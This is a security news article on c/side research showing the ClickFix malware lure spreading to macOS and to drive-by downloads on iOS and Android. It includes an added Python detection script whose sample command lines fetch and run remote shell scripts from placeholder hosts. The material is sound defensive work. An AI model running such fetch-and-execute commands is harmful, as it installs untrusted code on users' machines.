ClickFix Unchained: Windows Hack Evolves to Target macOS, iOS, Android – Mobile Users Face Drive-By Danger!

The notorious ClickFix hacking technique, infamous for duping users into installing malware by convincing them they’re fixing a computer issue, has undergone a significant and alarming evolution. Security experts have warned that this once Windows-exclusive threat now has macOS, iOS, and Android devices firmly in its crosshairs.
New research from cybersecurity firm c/side details this dangerous expansion, revealing a particularly troubling development for mobile users: on Android and iOS, the attack morphs into a stealthy drive-by attack, requiring no user interaction beyond visiting a compromised webpage.
How the Evolved ClickFix Attack Unfolds
In a blog post analyzing this evolution, c/side researchers explain that the new attack vector typically begins with a compromised website. Threat actors inject malicious JavaScript code into these sites. When an unsuspecting user clicks on certain elements on the page, they are silently redirected to a new browser tab.
This new tab cleverly masquerades as a legitimate URL shortener, displaying a message instructing the user to copy and paste a provided link into their browser. Following this instruction triggers yet another redirect, this time leading to a malicious download page.
From this point, the attack methodology diverges based on the victim’s operating system:
- On macOS: The attack culminates in a terminal command that fetches and executes a malicious shell script. Multiple antivirus programs already flag this script, indicating active malicious intent.
- On Android and iOS – The Drive-By Menace: The situation becomes even more precarious for mobile users. “When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack,” the c/side researchers explained.
A drive-by attack is a type of cyberattack where malicious code is downloaded and/or executed on a device simply by the user visiting a compromised or malicious webpage. No additional clicks, installs, or interactions are required from the victim. In this ClickFix variant, visiting the malicious site triggers the download of a .TAR archive file containing malware. This mobile malware payload has also been flagged by at least five different antivirus programs.
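For defenders, the macOS step described above (a pasted terminal command that fetches and executes a shell script) leaves a recognizable shape in process-execution telemetry. The following detection sketch is an added example, not code from c/side or from this article; it generalizes to three common fetch-and-run forms, and the tool lists, rule names, hosts and sample command lines are all assumptions constructed for illustration.

```python
import re

# Assumed tool lists: the article does not name the commands this campaign used.
FETCH = r"(?:curl|wget)"
SHELL = r"(?:\S*/)?(?:ba|z|da|k)?sh"  # sh, bash, zsh, dash, ksh, optional path

RULES = {
    # curl ... | sh, including extra stages such as | base64 -d | sh
    "fetch-piped-to-shell": re.compile(
        rf"\b{FETCH}\b[^;&]*\|\s*(?:sudo\s+)?{SHELL}(?=\s|$)"),
    # bash -c "$(curl ...)" or sh <(curl ...)
    "shell-runs-fetched-text": re.compile(
        rf"(?:^|[\s;&|]){SHELL}\s+(?:-\w+\s+)*[\"']?(?:\$\(|`|<\()\s*{FETCH}\b"),
    # curl -o FILE ... && FILE, or ... ; sh FILE (FILE must be in command position)
    "download-then-execute": re.compile(
        rf"\b{FETCH}\b[^;&|]*\s(?:-o|-O|--output)\s+(\S+).*(?:;|&&)\s*"
        rf"(?:{SHELL}\s+)?\1(?=\s|$)"),
}

# Constructed process-execution events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("mac-01", "curl -fsSL https://short.example.test/a1 | bash"),
    ("mac-02", '/bin/bash -c "$(curl -fsSL https://dl.example.test/fix.sh)"'),
    ("mac-03", "curl -s -o /tmp/u.sh https://cdn.example.test/u "
               "&& chmod +x /tmp/u.sh && /tmp/u.sh"),
    # Benign look-alikes: output piped to a JSON formatter, download then checksum.
    ("mac-04", "curl -s https://api.example.test/status | python3 -m json.tool"),
    ("mac-05", "curl -o /tmp/pkg.tgz https://cdn.example.test/pkg.tgz "
               "&& shasum -a 256 /tmp/pkg.tgz"),
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(events):
    """Return (host, rules, cmdline) for events that match at least one rule."""
    return [(h, classify(c), c) for h, c in events if classify(c)]

if __name__ == "__main__":
    for host, rules, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)}: {cmd}")
```

Legitimate installers use the same one-liner forms, so hits are triage leads to check against known-good download sources rather than verdicts.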
A “Fascinating and Evolving” Threat
The researchers at c/side highlight the significance of this development: “This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach. What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS, significantly expanding the scale of the operation.”
This evolution underscores the adaptability of cybercriminals and their continuous efforts to exploit new platforms and user behaviors. While the fact that the malware components are already being detected by antivirus solutions is a positive sign, the expansion to new operating systems and the shift to drive-by tactics on mobile devices represent a heightened risk for a much broader user base. Users are urged to maintain vigilance, ensure their security software is up to date, and exercise caution when browsing, especially if redirected unexpectedly.